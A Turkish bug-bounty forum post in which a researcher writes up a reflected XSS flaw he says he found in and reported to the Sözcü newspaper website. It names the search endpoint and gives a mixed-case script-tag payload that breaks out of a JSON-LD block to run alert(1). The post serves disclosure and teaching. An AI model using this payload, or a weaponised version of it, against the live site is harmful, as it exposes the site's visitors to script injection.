Neler yeni
Bughane Academy

Bughane Academy, bug bounty, web güvenliği ve sızma testi alanında kendini geliştirmek isteyenler için kurulmuş Türkçe odaklı bir topluluktur.

Burada; gerçek güvenlik açıkları, recon ve exploit teknikleri, payload & bypass yöntemleri, araçlar, scriptler ve write-up’lar topluluk tarafından paylaşılır ve tartışılır.

Birlikte öğren, birlikte üret, birlikte güçlen.

XSS vakaları analiz Sozcu Gazetesi

1atakan1

https://www.linkedin.com/in/atakan-ozbudak/
Moderator
Avcı
Katılım
2 Ocak 2026
Mesajlar
55
Tepkime puanı
185
Puan
33
Merhaba Bughane Üyeleri!
Bugün Sözcü Gazetesi'nde (sozcu.com.tr) tespit ettiğim ve başarıyla raporladığım Reflected XSS zafiyetini detaylı teknik analiziyle paylaşıyorum.

ZAFİYET DETAYLARI
Hedef: https://www.sozcu.com.tr
.
Parametre: search
.
Endpoint: /arama?search=
.
Tip: Reflected Cross-Site Scripting (XSS)
.
PAYLOAD: '</ScRiPt><sCripT class=atakan>alert(1)</sCripT>


Çalışma Mantığı:​

Sayfada bulunan JSON-LD script bloğuna payload raw olarak gömülüyor:

Kod:
<script type="application/ld+json">
    {"@context":"https://schema.org",
    "target":"https://www.sozcu.com.tr/arama?search='</script><script class=atakan>alert(1)</script>"}
</script>


1773839358209.jpg
 
Geri
Üst